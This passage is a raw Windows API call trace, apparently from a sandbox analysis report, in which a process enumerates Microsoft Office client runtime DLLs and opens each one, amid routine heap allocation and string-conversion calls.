RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.123] AreFileApisANSI () returned 1 [0100.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0100.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll") returned 59 [0100.123] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\ucrtbase.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e2e85a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e2e85a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1f5fb21, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xefec0)) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0100.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.123] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2f0533c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0100.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.124] AreFileApisANSI () returned 1 [0100.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll", lpUsedDefaultChar=0x0) returned 62 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.124] AreFileApisANSI () returned 1 [0100.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0100.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll") returned 62 [0100.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\vccorlib140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.125] GetFileType (hFile=0x418) returned 0x1 [0100.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.181] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.181] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.183] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.183] CloseHandle (hObject=0x418) returned 1 [0100.186] AreFileApisANSI () returned 1 [0100.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0100.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll") returned 62 [0100.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.188] GetFileType (hFile=0x418) returned 0x1 [0100.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.189] CloseHandle (hObject=0x418) returned 1 [0100.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0100.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0100.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0100.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.202] AreFileApisANSI () returned 1 [0100.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0100.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll") returned 62 [0100.202] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\vccorlib140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\vccorlib140.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2f0533c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0)) returned 1 [0100.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.206] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.206] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2424784, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2424784, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd26acf16, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0100.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0100.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0100.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0100.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0100.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0100.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0100.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0100.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.209] AreFileApisANSI () returned 1 [0100.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll", lpUsedDefaultChar=0x0) returned 63 [0100.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0100.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.209] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.210] AreFileApisANSI () returned 1 [0100.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e608 [0100.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll") returned 63 [0100.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\vcruntime140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.216] GetFileType (hFile=0x418) returned 0x1 [0100.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0100.217] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.217] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.217] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.217] CloseHandle (hObject=0x418) returned 1 [0100.217] AreFileApisANSI () returned 1 [0100.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e030 [0100.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll") returned 63 [0100.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\vcruntime140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0100.218] GetFileType (hFile=0x418) returned 0x1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.218] CloseHandle (hObject=0x418) returned 1 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.218] HeapFree (in: 